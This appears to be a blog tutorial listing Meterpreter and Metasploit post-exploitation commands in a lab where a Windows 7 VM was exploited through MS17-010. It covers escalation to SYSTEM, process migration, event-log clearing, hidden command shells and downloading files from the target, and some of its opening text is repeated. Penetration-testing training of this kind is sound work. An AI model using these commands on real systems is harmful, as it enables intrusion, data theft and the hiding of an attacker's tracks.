Quick Meterpreter and Metasploit tutorial - Core, System, Networking and File System usual commands
I thought that it would be useful, for some readers, if we review some of the most commonly used post-exploitation commands in Meterpreter and Metasploit.
In this first video, we will discuss the Core, System, Networking and File System commands.
Kali6 (Kali Linux, attacker VM): 192.168.254.142
W7x64-1 (Windows 7, target VM): 192.168.254.70
W2008R21 (Windows 2008R2, Domain Controller): 192.168.254.99
Domain name: TESTLAB3
The Windows 7 test machine is affected by the MS17-010 vulnerability. For exploitation, we will follow the steps detailed in the previous post:
MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit
We will start with Core and System commands and obviously the first command should be ... HELP ! :-)
Machine name, Operating System, OS architecture (x86/x64), system language, domain name.
The "getuid" command will display the user context used by Meterpreter.
In our case, Meterpreter is running as SYSTEM, therefore it has all the available permissions.
In that situation we would run the "background" command. The Meterpreter session will be sent into background and we will get back to the Metasploit prompt. The Meterpreter session will stay connected in the background, waiting to be reactivated.
The "sessions" command, depending on the command option, will allow to list, resume or terminate the Meterpreter sessions. See all the available options in the picture below:
"sessions -l" (or "sessions") will list all the active Meterpreter sessions
A Meterpreter session is identified by the session ID number.
(Session ID is 1 in the picture shown above)
Note that each process is identified by a process ID number or PID
Also, each process runs under a user context
For example - lsass.exe has PID 512 and runs under the SYSTEM user context
Example:
ps -U 'TESTLAB3\\testuser1'
Example:
pgrep wordpad
In this case, the PID is 1040
Example:
migrate 512
Example:
kill 2920
In our lab, Meterpreter is already running under the SYSTEM user context, so the "getsystem" command is not going to achieve anything.
"exit" will terminate the command shell and we will get back to the Meterpreter prompt.
Check the available options in the picture below:
Example:
execute -f cmd.exe -i -H
will launch a command shell on the target machine. The process will be hidden from view and we can interact with the shell after creating it.
In this first video, we will discuss the Core, System, Networking and File System commands.
LAB details - VM names and IP addresses
Kali6 (Kali Linux, attacker VM): 192.168.254.142
W7x64-1 (Windows 7, target VM): 192.168.254.70
W2008R21 (Windows 2008R2, Domain Controller): 192.168.254.99
Domain name: TESTLAB3
Exploitation process
The Windows 7 test machine is affected by the MS17-010 vulnerability. For exploitation, we will follow the steps detailed in the previous post:
MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit
Core and System commands
We will start with Core and System commands and obviously the first command should be ... HELP ! :-)
1. help
See below the help output for the Core and System commands:2. sysinfo
Use "sysinfo" in order to get essential information about the target computer:Machine name, Operating System, OS architecture (x86/x64), system language, domain name.
3. getuid
The Meterpreter server is running on the target computer, under a specific user context. That particular user context will determine the level of permissions that the attacker has on the target computer. Obviously, we would like to have the highest level of permissions (system / local admin).The "getuid" command will display the user context used by Meterpreter.
In our case, Meterpreter is running as SYSTEM, therefore it has all the available permissions.
4. background
There are situations when we successfully exploit a target and we get to a Meterpreter prompt, but we need to get back to a Metasploit prompt in order to run different other commands, without disconnecting the previously established Meterpreter session.In that situation we would run the "background" command. The Meterpreter session will be sent into background and we will get back to the Metasploit prompt. The Meterpreter session will stay connected in the background, waiting to be reactivated.
5. sessions -l (or sessions)
Let's say that we successfully exploited multiple targets and we have multiple Meterpreter sessions running in the background.The "sessions" command, depending on the command option, will allow to list, resume or terminate the Meterpreter sessions. See all the available options in the picture below:
"sessions -l" (or "sessions") will list all the active Meterpreter sessions
A Meterpreter session is identified by the session ID number.
(Session ID is 1 in the picture shown above)
6. sessions -i <Session_ID>
This command will resume interaction with a Meterpreter session that was previously sent to background. We will get back to the Meterpreter prompt.7. clearev
The "clearev" command will remove all the records from Event Log, on the target computer.8. localtime
This command will display the date and time on the target computer9. ps
The "ps" command will list all the processes running on the target computer ...Note that each process is identified by a process ID number or PID
Also, each process runs under a user context
For example - lsass.exe has PID 512 and runs under the SYSTEM user context
10. ps -U <user_context>
This command will list only the processes running under the specified user contextExample:
ps -U 'TESTLAB3\\testuser1'
11. ps -s
This command will list all the processes running under the SYSTEM user context12. pgrep <Process_Name>
This command will return the PID for the specified process nameExample:
pgrep wordpad
13. getpid
The "getpid" command will return the PID under which the Meterpreter server is currently runningIn this case, the PID is 1040
14. migrate <New_PID>
This command will migrate the Meterpreter server from the current process to a new process having <New_PID>Example:
migrate 512
15. kill <PID>
This command will terminate a process running on the target computer, having the specified <PID>Example:
kill 2920
16. pkill <Process_Name>
This command will terminate a process specified by name17. getsystem
This command will attempt to elevate the Meterpreter permissions on the target machine to SYSTEM (local admin) level.In our lab, Meterpreter is already running under the SYSTEM user context, so the "getsystem" command is not going to achieve anything.
18. shell
This command will launch a system command shell on the target machine. After that, we can run any commands directly on the target machine."exit" will terminate the command shell and we will get back to the Meterpreter prompt.
19. execute
This command will execute a specified command or application on the target machine.Check the available options in the picture below:
Example:
execute -f cmd.exe -i -H
will launch a command shell on the target machine. The process will be hidden from view and we can interact with the shell after creating it.
20. reboot
This command will reboot the target computer. See the available options in the picture below:File System commands
21. show_mount
This command will list all the logical drives and mount points available on the target computer22. lpwd
The "lpwd" command will display the local working directory, on the Kali computer
23. lcd <New_Path>
This command allows changing the local working directory to <New_Path>
Example:
lcd /root/TEMP
24. pwd
"pwd" will display the remote working directory, on the target machine
25. cd <New_Path>
This command will change the remote working directory to <New_Path>
Example:
cd \
Note: Some File System commands will use by default the local and/or remote working directories, unless a particular directory is specified.
26. dir or ls
This command will list the files located in the remote working directory (on the target computer)
Of course, we can also use this command by specifying a particular directory.
27. cat <File_Name>
The "cat" command will display the contents of the specified file, to the screen
Example cat test1.txt
28. search
This command will search for a specified file or file pattern on the target computer
Example:
search -f *.txt -d 'c:\\TMP'
will search for text files into the c:\TMP directory (on the target computer)
29. edit
This command will edit the specified file
Example:
edit C:\\TMP\\test1.txt
Use :qa! to exit
30. download
This command will download files from the target computer to the local Kali computer
Examples:
download c:\\tmp\\test1.txt
will download the c:\tmp\test1.txt file to the local working directory.
download *.jpg
will download the jpeg files located into the remote working directory, to the local working directory
31. rm
The "rm" command will delete the specified file(s) from the target computer
Example:
rm test3.txt
32. upload
This command will upload files from the local Kali computer to the target computer.
Example:
upload test3.txt
will upload the test3.txt file located in the local working directory, to the remote working directory, on the target computer
Networking commands
33. arp
This command will display the arp cache on the target computer
34. ipconfig or ifconfig
This command will display the network interfaces and the ip configuration, on the target computer
35. netstat
This command will provide information about protocols in use and network connections, on the target computer
36. route
This command will display and edit the routing table, on the target computer
37. resolve
This command will resolve host names, on the target computer
Example:
resolve w2008r21
will resolve the "w2008r21" name (that's the lab DC name)
will resolve the "w2008r21" name (that's the lab DC name)
Comments
Post a Comment